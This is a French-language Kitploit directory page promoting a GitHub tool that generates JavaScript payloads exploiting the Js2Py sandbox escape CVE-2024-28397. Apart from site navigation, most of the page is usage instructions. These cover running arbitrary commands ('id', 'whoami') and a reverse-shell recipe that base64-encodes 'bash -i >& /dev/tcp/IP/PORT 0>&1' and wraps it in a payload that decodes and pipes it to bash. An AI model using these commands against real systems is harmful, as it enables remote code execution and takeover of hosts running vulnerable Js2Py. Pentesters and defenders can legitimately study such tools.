Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-28397-Js2Py-RCE — Génère des payloads JavaScript pour exploiter l'évasion de sandbox Js2Py CVE-2024-28397, permettant l'exécution de commandes à distance et des shells inversés via l'exposition des internes de Python. | Kitploit
Outils/GitHubGitHub/y0naldez/cve-2024-28397-js2py-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleGénération de Shellcode
GitHuby0naldez/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Génère des payloads JavaScript pour exploiter l'évasion de sandbox Js2Py CVE-2024-28397, permettant l'exécution de commandes à distance et des shells inversés via l'exposition des internes de Python.

Voir le dépôt
16il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-28397 - Générateur de charge utile d'évasion de sandbox Js2Py

Ce script génère une charge utile JavaScript pouvant être évaluée par Js2Py dans des environnements vulnérables où les internes de Python sont exposés via des wrappers d'objets.

Utilisation

Exécution de commande de base :

python3 cve-2024-28397.py -c "id"

Générer une charge utile compacte sur une seule ligne :

python3 cve-2024-28397.py -c "whoami" --compact

Shell inversé avec Base64

Générer la charge utile Base64 :

echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0

Générer la charge utile Js2Py :

python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact

Remplacez BASE64_OUTPUT par la chaîne Base64 générée lors de la première étape.

Télécharger l’outil